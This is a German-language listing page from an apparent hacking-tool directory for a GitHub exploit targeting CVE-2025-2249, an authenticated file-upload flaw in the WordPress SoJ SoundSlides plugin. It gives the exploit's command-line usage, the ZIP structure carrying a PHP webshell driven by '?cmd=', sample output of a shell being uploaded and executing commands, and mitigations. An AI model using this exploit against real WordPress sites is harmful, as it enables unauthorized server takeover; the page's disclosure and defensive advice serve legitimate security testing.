Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2249 — WordPress SoJ SoundSlides Plugin <= 1.2.2 ist anfällig für beliebigen Datei-Upload. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-2249
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-2249

CVE-2025-2249

WordPress SoJ SoundSlides Plugin <= 1.2.2 ist anfällig für beliebigen Datei-Upload.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authentifizierter beliebiger Datei-Upload

⚠️ HAFTUNGSAUSSCHLUSS: Dieser Exploit dient ausschließlich zu Bildungs- und autorisierten Testzwecken.


📌 Zusammenfassung der Schwachstelle

  • Plugin: SoJ SoundSlides
  • Betroffene Versionen: <= 1.2.2
  • Typ: Authentifizierter (Contributor+) beliebiger Datei-Upload
  • Patch-Status: ❌ Kein offizieller Fix verfügbar

Das SoJ SoundSlides-Plugin erlaubt authentifizierten Benutzern mit der Rolle Contributor oder höher, beliebige ZIP-Dateien hochzuladen. Aufgrund fehlender Validierung können Angreifer PHP-Webshells hochladen, die aus einem über das Web erreichbaren Verzeichnis extrahiert und ausgeführt werden.


💥 Auswirkungen

Ein Angreifer mit gültigen WordPress-Zugangsdaten kann:

  • 📦 Ein ZIP-Archiv mit einer PHP-Shell hochladen
  • 🖥️ Systembefehle remote ausführen (?cmd=)
  • 🔓 Unbefugte Kontrolle über die Website/den Server erlangen

🛠️ Verwendung

usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
ArgumentBeschreibung
-uWordPress-Basis-URL
-unWordPress-Benutzername
-pWordPress-Passwort

✨ Funktionen

  • 🔍 Versionsprüfung aus der Plugin-readme.txt
  • 🧰 Automatische Generierung eines ZIP mit erforderlicher Struktur und Webshell
  • 📤 Nutzt den verwundbaren Upload-Endpunkt aus
  • 💻 Interaktive Befehlsausführung über die hochgeladene Shell

📂 ZIP-Dateistruktur

nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)

🧪 Beispiel

[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data

🛡️ Gegenmaßnahmen

  • ❌ Deaktivieren oder entfernen Sie das Plugin
  • 🧱 Wenden Sie Upload-Einschränkungen an
  • 🔍 Überwachen Sie wp-content/uploads/ auf unerwartete .php-Dateien

Mit ❤️ erstellt von [Nxploited | Khaled ALenazi]
Für Bildung, Sensibilisierung und Verteidigung.


🧠 Abschließende Bemerkung

Sicherheit ist die Verantwortung eines jeden. Testen Sie immer ethisch, melden Sie verantwortungsvoll und schützen Sie das Web.

Tool herunterladen